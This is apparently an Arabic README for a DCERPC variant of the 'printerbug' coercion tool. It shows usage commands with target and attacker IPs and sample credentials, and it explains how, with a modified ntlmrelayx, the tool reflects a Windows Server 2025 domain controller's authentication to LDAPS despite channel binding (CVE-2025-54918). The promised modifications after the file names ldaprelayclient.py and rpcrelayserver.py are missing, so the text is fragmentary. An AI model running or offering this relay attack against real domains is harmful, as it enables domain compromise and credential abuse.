
نسخة printerbug.py الخاصة بـ DCERPC فقط
printerbugnew.py <target_host> [username] [password] [domain] [attacker_host] [tcp_port]
printerbugnew.py 192.168.1.100
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50 49152

يعمل هذا الاستغلال عبر الانعكاس فقط على W2025 مع "printerbug" الجديد (DCERPC بدلاً من الأنابيب المسماة).
ستحتاج إلى تعديل ntlmrelayx في بضع نقاط ليعمل. بعد ذلك، يمكنك تشغيل ثغرة الطابعة عن بُعد على وحدة تحكم مجال (DC) بنظام W2025 وعكس المصادقة عبر LDAPS(!)، حتى إذا كانت ارتباطات القناة (Channel Bindings) مطلوبة
ldaprelayclient.py:

rpcrelayserver.py
والتتابع ;)

تم إصلاح الثغرة في تحديث Patch Tuesday لشهر سبتمبر 2025: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54918
يضمن الإصلاح أن يتم حساب MIC دائمًا، حتى عندما تكون رسالة Type 3 فارغة.
شكرًا لمؤلف هذه الثغرة (CVE) على التلميح القيّم :)